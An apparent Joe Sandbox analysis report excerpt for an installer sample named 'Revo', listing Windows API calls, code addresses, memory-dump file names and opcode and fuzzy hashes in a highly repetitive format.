• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
• Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,004266F0,0041E6F0,0040361A,00008001,00008001,0040351E,004266F0,00004000,?,00000000,004033C8), ref: 00406229
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                            • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                                                                                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                                                                                                                                            APIs
                                                                                                                                                                            • MessageBoxIndirectW.USER32(0040A3E0), ref: 00405D5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IndirectMessage
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1874166685-0
                                                                                                                                                                            • Opcode ID: e599ad68c8be2b87716b93389efebd5836f5a776e8aa86078d111b59df2cb3f7
                                                                                                                                                                            • Instruction ID: 054c65bb711e663e566a4fe45ca9fd0f36251d7a25d2d2c6c9ec5f98a3fa3aea
                                                                                                                                                                            • Opcode Fuzzy Hash: e599ad68c8be2b87716b93389efebd5836f5a776e8aa86078d111b59df2cb3f7
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EF0F8316103048BC754CF58EAA872637E0E745700F10813FE881A23F0E7B84491CF4E
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,0040659D,?,?,?,?,Remove folder: ,?,00000000), ref: 00406533
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                            • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                            • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040463B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3367045223-0
                                                                                                                                                                            • Opcode ID: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                                                                                                            • Instruction ID: 40b0c8aab23b9b46c3ec191ca1ef6f3d1e6ea20de3ce9ad326d3c9787e78ebc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                                                                                                            • Instruction Fuzzy Hash: 36C04C75548300BFE641A759CC42F1FB799EF94355F40C92EB15DA11D1C67588209A2A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 6e1b277ce2e60e4bca7100d33b085465e2d15658cc9e03b99e7eec8e5e984b4d
                                                                                                                                                                            • Instruction ID: af208d489c9886f4e313255891423178c9fbc2f2764a4643b28e90c636558d3c
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e1b277ce2e60e4bca7100d33b085465e2d15658cc9e03b99e7eec8e5e984b4d
                                                                                                                                                                            • Instruction Fuzzy Hash: 56C04C716402007ADA119B509E49F0777A857D0750F154A79B641E50E0E7B5E450D61D
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,0040441A), ref: 0040464D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                              • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                                              • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                                              • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                                              • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                                              • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2972824698-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                                                                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00405188
                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
  • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
• GetWindowLongW.USER32(?,000000F0), ref: 004052CC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
• ShowWindow.USER32(?,00000005), ref: 004052EA
• SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
• ImageList_Destroy.COMCTL32(?), ref: 004054B8
• GlobalFree.KERNEL32(?), ref: 004054C8
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
• SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
• ShowWindow.USER32(?,00000000), ref: 00405672
• GetDlgItem.USER32(?,000003FE), ref: 0040567D
• ShowWindow.USER32(00000000), ref: 00405684
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 2564846305-813528018
• Opcode ID: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
• Instruction ID: 154044203e87ae86578454b6b14b757097bfc819611b9ce4677548c75e4aac0f
• Instruction Fuzzy Hash: D8028D70900609AFDB20DFA5CD85AAF7BB5FB45314F10857AF910BA2E1D7B98A41CF18
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
• GetDlgItem.USER32(?,000003E8), ref: 00404892
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
• GetSysColor.USER32(?), ref: 004048C0
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
• lstrlenW.KERNEL32(?), ref: 004048E1
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
• GetDlgItem.USER32(?,0000040A), ref: 0040495C
• SendMessageW.USER32(00000000), ref: 00404963
• GetDlgItem.USER32(?,000003E8), ref: 0040498E
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
• LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
• SetCursor.USER32(00000000), ref: 004049E2
• LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
• SetCursor.USER32(00000000), ref: 004049FE
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: N$Remove folder: $WG@
• API String ID: 3103080414-2486083310
• Opcode ID: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
• Instruction ID: 519c373e7f185e7fda66e670232f02753279bd673d39c82729c50cf19e81ba39
• Instruction Fuzzy Hash: 6461B3B1A40209BFDF10AF60CD85A6A7B79FB84304F00843AFA15B62D0D779A951CF99
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00464260,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
• Instruction ID: dda4e0b8355a10cf3a4659add9ec42a83d374e9472f600803517c33aed587cab
• Instruction Fuzzy Hash: 96418A71804209AFCF058FA5DE459BFBBB9FF45314F00802EF991AA1A0C7749A55DFA4
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
• GetShortPathNameW.KERNEL32(?,0045ADE8,00000400), ref: 0040632C
  • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
  • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
• GetShortPathNameW.KERNEL32(?,0045B5E8,00000400), ref: 00406349
• wsprintfA.USER32 ref: 00406367
• GetFileSize.KERNEL32(00000000,00000000,0045B5E8,C0000000,00000004,0045B5E8,?,?,?,?,?), ref: 004063A2
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
• SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045A9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
• GlobalFree.KERNEL32(00000000), ref: 00406450
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
  • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
  • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                                                                                            • API String ID: 2171350718-461813615
                                                                                                                                                                            • Opcode ID: 4099efde17faabea8ca23ed937e5d9f442c3975f0fb2967c08604eca1be790f2
